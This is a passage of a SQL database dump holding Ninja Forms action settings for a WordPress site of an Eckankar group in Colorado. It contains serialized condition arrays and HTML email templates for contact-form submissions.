ype\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2241,84,'payment_gateways','','payment_gateways',''),(2242,84,'payment_total','0','payment_total','0'),(2243,84,'tag','','tag',''),(2244,84,'email_message_plain','','email_message_plain',''),(2245,84,'drawerDisabled','','drawerDisabled',''),(2246,84,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(2247,84,'parent_id','21','parent_id','21'),(2248,85,'title','','title',''),(2249,85,'key','','key',''),(2250,85,'type','save','type','save'),(2251,85,'active','1','active','1'),(2252,85,'created_at','2018-01-03 11:44:55','created_at','2018-01-03 11:44:55'),(2253,85,'label','Save Form','label','Save Form'),(2254,85,'objectType','Action','objectType','Action'),(2255,85,'objectDomain','actions','objectDomain','actions'),(2256,85,'editActive','','editActive',''),(2257,85,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2258,85,'payment_gateways','','payment_gateways',''),(2259,85,'payment_total','0','payment_total','0'),(2260,85,'tag','','tag',''),(2261,85,'to','{wp:admin_email}','to','{wp:admin_email}'),(2262,85,'reply_to','','reply_to',''),(2263,85,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(2264,85,'email_message','{fields_table}','email_message','{fields_table}'),(2265,85,'email_message_plain','','email_message_plain',''),(2266,85,'from_name','','from_name',''),(2267,85,'from_address','','from_address',''),(2268,85,'email_format','html','email_format','html'),(2269,85,'cc','','cc',''),(2270,85,'bcc','','bcc',''),(2271,85,'redirect_url','','redirect_url',''),(2272,85,'parent_id','22','parent_id','22'),(2273,86,'title','','title',''),(2274,86,'key','','key',''),(2275,86,'type','email','type','email'),(2276,86,'active','1','active','1'),(2277,86,'created_at','2018-01-03 11:44:55','created_at','2018-01-03 11:44:55'),(2278,86,'date_updated','2016-01-15','date_updated','2016-01-15'),(2279,86,'attach_csv','0','attach_csv','0'),(2280,86,'email_format','html','email_format','html'),(2281,86,'reply_to','','reply_to',''),(2282,86,'cc','','cc',''),(2283,86,'bcc','','bcc',''),(2284,86,'redirect_url','','redirect_url',''),(2285,86,'success_msg','','success_msg',''),(2286,86,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(2287,86,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(2288,86,'to','{field:email_180}','to','{field:email_180}'),(2289,86,'email_subject','Pueblo Area Initiators and ESAâs','email_subject','Pueblo Area Initiators and ESAâs'),(2290,86,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_178},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Pueblo ECK Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_178}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_179}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_180}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_181}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_182}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166886411}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_186}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_178},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Pueblo ECK Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_178}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_179}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_180}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_181}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_182}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166886411}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_186}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(2291,86,'label','Send copy to user','label','Send copy to user'),(2292,86,'objectType','Action','objectType','Action'),(2293,86,'objectDomain','actions','objectDomain','actions'),(2294,86,'editActive','','editActive',''),(2295,86,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2296,86,'payment_gateways','','payment_gateways',''),(2297,86,'payment_total','0','payment_total','0'),(2298,86,'tag','','tag',''),(2299,86,'email_message_plain','','email_message_plain',''),(2300,86,'parent_id','22','parent_id','22'),(2301,87,'title','','title',''),(2302,87,'key','','key',''),(2303,87,'type','successmessage','type','successmessage'),(2304,87,'active','1','active','1'),(2305,87,'created_at','2018-01-03 11:44:55','created_at','2018-01-03 11:44:55'),(2306,87,'date_updated','2016-01-15','date_updated','2016-01-15'),(2307,87,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(2308,87,'from_name','','from_name',''),(2309,87,'from_address','','from_address',''),(2310,87,'to','{wp:admin_email}','to','{wp:admin_email}'),(2311,87,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(2312,87,'email_message','{fields_table}','email_message','{fields_table}'),(2313,87,'attach_csv','0','attach_csv','0'),(2314,87,'email_format','html','email_format','html'),(2315,87,'reply_to','','reply_to',''),(2316,87,'cc','','cc',''),(2317,87,'bcc','','bcc',''),(2318,87,'redirect_url','','redirect_url',''),(2319,87,'label','Success Message','label','Success Message'),(2320,87,'objectType','Action','objectType','Action'),(2321,87,'objectDomain','actions','objectDomain','actions'),(2322,87,'editActive','','editActive',''),(2323,87,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2324,87,'payment_gateways','','payment_gateways',''),(2325,87,'payment_total','0','payment_total','0'),(2326,87,'tag','','tag',''),(2327,87,'email_message_plain','','email_message_plain',''),(2328,87,'parent_id','22','parent_id','22'),(2329,88,'title','','title',''),(2330,88,'key','','key',''),(2331,88,'type','email','type','email'),(2332,88,'active','1','active','1'),(2333,88,'created_at','2018-01-03 11:44:55','created_at','2018-01-03 11:44:55'),(2334,88,'date_updated','2016-01-19','date_updated','2016-01-19'),(2335,88,'from_name','Pueblo Area Initiators and ESAâs','from_name','Pueblo Area Initiators and ESAâs'),(2336,88,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(2337,88,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(2338,88,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(2339,88,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Pueblo Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Pueblo ECK Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_178}Â {field:lastname_179}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_178}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_179}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_180}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_181}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_182}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166886411}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_186}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Pueblo Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Pueblo ECK Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_178}Â {field:lastname_179}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_178}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_179}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_180}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_181}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_182}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166886411}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_186}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(2340,88,'attach_csv','0','attach_csv','0'),(2341,88,'email_format','html','email_format','html'),(2342,88,'reply_to','','reply_to',''),(2343,88,'cc','','cc',''),(2344,88,'bcc','','bcc',''),(2345,88,'redirect_url','','redirect_url',''),(2346,88,'success_msg','','success_msg',''),(2347,88,'label','Admin Email','label','Admin Email'),(2348,88,'objectType','Action','objectType','Action'),(2349,88,'objectDomain','actions','objectDomain','actions'),(2350,88,'editActive','','editActive',''),(2351,88,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2352,88,'payment_gateways','','payment_gateways',''),(2353,88,'payment_total','0','payment_total','0'),(2354,88,'tag','','tag',''),(2355,88,'email_message_plain','','email_message_plain',''),(2356,88,'drawerDisabled','','drawerDisabled',''),(2357,88,'parent_id','22','parent_id','22'),(2358,89,'title','','title',''),(2359,89,'key','','key',''),(2360,89,'type','save','type','save'),(2361,89,'active','1','active','1'),(2362,89,'created_at','2018-01-03 11:45:04','created_at','2018-01-03 11:45:04'),(2363,89,'label','Save Form','label','Save Form'),(2364,89,'objectType','Action','objectType','Action'),(2365,89,'objectDomain','actions','objectDomain','actions'),(2366,89,'editActive','','editActive',''),(2367,89,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2368,89,'payment_gateways','','payment_gateways',''),(2369,89,'payment_total','0','payment_total','0'),(2370,89,'tag','','tag',''),(2371,89,'to','{w